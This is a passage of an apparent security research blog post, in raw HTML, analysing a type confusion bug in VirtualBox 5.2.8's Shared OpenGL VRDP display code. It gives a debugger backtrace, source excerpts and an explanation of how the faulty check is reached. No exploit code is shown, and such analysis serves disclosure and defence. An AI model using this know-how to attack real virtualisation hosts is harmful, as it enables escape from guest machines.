in crPMgrFbDisconnectTargetDisplays (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, pDpInfo=0x7f7dcc5163f0 &lt;g_CrPresenter+48&gt;, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2226  #9  0x00007f7dcc1d0787 in crPMgrModeModifyTarget (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, iDisplay=0x0, u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2370  #10 0x00007f7dcc1d088f in crPMgrModeModify (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2396  #11 0x00007f7dcc1d0c81 in crPMgrModeModifyGlobal (u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2495  #12 0x00007f7dcc1d0d69 in CrPMgrModeVrdp (fEnable=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2536  #13 0x00007f7dcc1e1bc8 in crVBoxServerSetOffscreenRendering (value=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c:2734  #14 0x00007f7dcc1c9aca in svcHostCallPerform (u32Function=0x14, cParms=0x1, paParms=0x7f7df00fcb30) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserver\/crservice.cpp:1338  #15 0x00007f7dcc1ca071 in crVBoxServerHostCtl (pCtl=0x7f7df00fcb10, cbCtl=0x38) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserver\/crservice.cpp:1438  #16 0x00007f7dcc1e2bc7 in crVBoxCrCmdHostCtl (hSvr=0x0, pCmd=0x7f7df00fcb10 &#8220;\u000001&#8221;, cbCmd=0x38) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c:3218  #17 0x00007f7db756add6 in vboxVDMACrHostCtlProcess (pVdma=0x555786209b10, pCmd=0x7f7dcd054f80, pfContinue=0x7f7df06ade17) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Devices\/Graphics\/DevVGA_VDMA.cpp:1376  #18 0x00007f7db756e391 in vboxVDMAWorkerThread (hThreadSelf=0x55578563bde0, pvUser=0x555786209b10) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Devices\/Graphics\/DevVGA_VDMA.cpp:2696  #19 0x00007f7e1481bb87 in rtThreadMain (pThread=0x55578563bde0, NativeThread=0x7f7df06ae700, pszThreadName=0x55578563c6c0 &#8220;VDMA&#8221;) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Runtime\/common\/misc\/thread.cpp:719  #20 0x00007f7e148e36af in rtThreadNativeMain (pvArgs=0x55578563bde0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Runtime\/r3\/posix\/thread-posix.cpp:327  #21 0x00007f7e10075494 in start_thread (arg=0x7f7df06ae700) at pthread_create.c:333  #22 0x00007f7e1222671f in clone () at ..\/sysdeps\/unix\/sysv\/linux\/x86_64\/clone.S:105<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4b3589652091-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4b3589652091-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-1\"><span class=\"crayon-p\">#0&nbsp;&nbsp;ConsoleVRDPServer::H3DORVisibleRegion (H3DORInstance=0x7f7db9817190, cRects=0x1, paRects=0x7f7db9ccad20) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1996<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-2\"><span class=\"crayon-p\">#1&nbsp;&nbsp;0x00007f7dcc1f0298 in CrFbDisplayVrdp::vrdpRegions (this=0x7f7db91fdf90, pFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, hEntry=0x7f7dcd079dc0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:255<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-3\"><span class=\"crayon-p\">#2&nbsp;&nbsp;0x00007f7dcc1efddd in CrFbDisplayVrdp::EntryRemoved (this=0x7f7db91fdf90, pFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, hEntry=0x7f7dcd079dc0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:116<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-4\"><span class=\"crayon-p\">#3&nbsp;&nbsp;0x00007f7dcc1f4e40 in CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:323<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-5\"><span class=\"crayon-p\">#4&nbsp;&nbsp;0x00007f7dcc1f0024 in CrFbDisplayVrdp::fbCleanup (this=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:193<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-6\"><span class=\"crayon-p\">#5&nbsp;&nbsp;0x00007f7dcc1f4808 in CrFbDisplayBase::setFramebuffer (this=0x7f7db91fdf90, pFb=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:97<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-7\"><span class=\"crayon-p\">#6&nbsp;&nbsp;0x00007f7dcc1f3ab1 in CrFbDisplayComposite::remove (this=0x7f7db92702b0, pDisplay=0x7f7db91fdf90, fCleanupDisplay=0x1) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_composite.cpp:67<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-8\"><span class=\"crayon-p\">#7&nbsp;&nbsp;0x00007f7dcc1cf823 in crPMgrFbDisconnectDisplay (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, pDp=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2008<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-9\"><span class=\"crayon-p\">#8&nbsp;&nbsp;0x00007f7dcc1d02cf in crPMgrFbDisconnectTargetDisplays (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, pDpInfo=0x7f7dcc5163f0 &lt;g_CrPresenter+48&gt;, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2226<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-10\"><span class=\"crayon-p\">#9&nbsp;&nbsp;0x00007f7dcc1d0787 in crPMgrModeModifyTarget (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, iDisplay=0x0, u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2370<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-11\"><span class=\"crayon-p\">#10 0x00007f7dcc1d088f in crPMgrModeModify (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2396<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-12\"><span class=\"crayon-p\">#11 0x00007f7dcc1d0c81 in crPMgrModeModifyGlobal (u32ModeAdd=0x0, u32ModeRemove=0x4) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2495<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-13\"><span class=\"crayon-p\">#12 0x00007f7dcc1d0d69 in CrPMgrModeVrdp (fEnable=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2536<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-14\"><span class=\"crayon-p\">#13 0x00007f7dcc1e1bc8 in crVBoxServerSetOffscreenRendering (value=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c:2734<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-15\"><span class=\"crayon-p\">#14 0x00007f7dcc1c9aca in svcHostCallPerform (u32Function=0x14, cParms=0x1, paParms=0x7f7df00fcb30) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserver\/crservice.cpp:1338<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-16\"><span class=\"crayon-p\">#15 0x00007f7dcc1ca071 in crVBoxServerHostCtl (pCtl=0x7f7df00fcb10, cbCtl=0x38) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserver\/crservice.cpp:1438<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-17\"><span class=\"crayon-p\">#16 0x00007f7dcc1e2bc7 in crVBoxCrCmdHostCtl (hSvr=0x0, pCmd=0x7f7df00fcb10 &#8220;\u000001&#8221;, cbCmd=0x38) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c:3218<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-18\"><span class=\"crayon-p\">#17 0x00007f7db756add6 in vboxVDMACrHostCtlProcess (pVdma=0x555786209b10, pCmd=0x7f7dcd054f80, pfContinue=0x7f7df06ade17) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Devices\/Graphics\/DevVGA_VDMA.cpp:1376<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-19\"><span class=\"crayon-p\">#18 0x00007f7db756e391 in vboxVDMAWorkerThread (hThreadSelf=0x55578563bde0, pvUser=0x555786209b10) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Devices\/Graphics\/DevVGA_VDMA.cpp:2696<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-20\"><span class=\"crayon-p\">#19 0x00007f7e1481bb87 in rtThreadMain (pThread=0x55578563bde0, NativeThread=0x7f7df06ae700, pszThreadName=0x55578563c6c0 &#8220;VDMA&#8221;) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Runtime\/common\/misc\/thread.cpp:719<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-21\"><span class=\"crayon-p\">#20 0x00007f7e148e36af in rtThreadNativeMain (pvArgs=0x55578563bde0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Runtime\/r3\/posix\/thread-posix.cpp:327<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4b3589652091-22\"><span class=\"crayon-p\">#21 0x00007f7e10075494 in start_thread (arg=0x7f7df06ae700) at pthread_create.c:333<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4b3589652091-23\"><span class=\"crayon-p\">#22 0x00007f7e1222671f in clone () at ..\/sysdeps\/unix\/sysv\/linux\/x86_64\/clone.S:105<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0100 seconds] -->  <\/p>\n<p>Frames #22 &#8211; #14 are a generic handler of VDMA requests including calls to Shared OpenGL Service (Chromium Service) from a guest or a host. Frames #13 &#8211; #9 do preparations for the following creation or close of displays. (Display is a part of screen sent to a client. There may be several displays, one of them may represents an entire screen and another may be a little rectangle as an update for the screen.) At frames #8 &#8211; #7 we reach the point where a type confusion occurs.<\/p>\n<p><b>Type Confusion<\/b><br \/> Frame #7 is of the following function crPMgrFbDisconnectDisplay:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4c3538985651\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> static int crPMgrFbDisconnectDisplay(HCR_FRAMEBUFFER hFb, CrFbDisplayBase *pDp)  {      &#8230;        if (pDp-&gt;getContainer() == pFbInfo-&gt;pDpComposite)      {          pFbInfo-&gt;pDpComposite-&gt;remove(pDp);          &#8230;          return VINF_SUCCESS;      }        WARN((&#8220;misconfig&#8221;));      return VERR_INTERNAL_ERROR;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4c3538985651-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4c3538985651-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-1\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">crPMgrFbDisconnectDisplay<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">HCR_FRAMEBUFFER <\/span><span class=\"crayon-v\">hFb<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CrFbDisplayBase *<\/span><span class=\"crayon-v\">pDp<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pDp<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">getContainer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pFbInfo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pDpComposite<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pFbInfo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">pDpComposite<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-e\">remove<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pDp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VINF_SUCCESS<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">WARN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;misconfig&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4c3538985651-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VERR_INTERNAL_ERROR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4c3538985651-14\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0020 seconds] -->  <\/p>\n<p>The second argument is an object of CrFbDisplayBase class. This class has the following subclasses: CrFbDisplayComposite, CrFbDisplayWindow, CrFbDisplayWindowRootVr, CrFbDisplayVrdp. In our case the type of pDp object is not CrFbDisplayBase but CrFbDisplayVrdp so its virtual table pointer references CrFbDisplayVrdp table. Please note this.<\/p>\n<p>When pDp-&gt;getContainer() is called the call goes to the base class&#8217; method getContainer because only CrFbDisplayBase implements it. The return value of this method is an object of type CrFbDisplayComposite. It&#8217;s strange because in our case the object is actually of\u00a0type CrFbDisplayVrdp.<\/p>\n<p>This allows to pass the check and to call CrFbDisplayComposite::remove() method (frame #6). This method calls CrFbDisplayBase::setFramebuffer, which has another interesting line:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4da978915659\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int CrFbDisplayBase::setFramebuffer(struct CR_FRAMEBUFFER *pFb)  {  &#8230;        if (mpFb)      {          rc = fbCleanup();  &#8230;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4da978915659-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4da978915659-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4da978915659-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4da978915659-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4da978915659-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4da978915659-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4da978915659-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4da978915659-8\">8<\/div>\n<div class=\"crayon-num\" 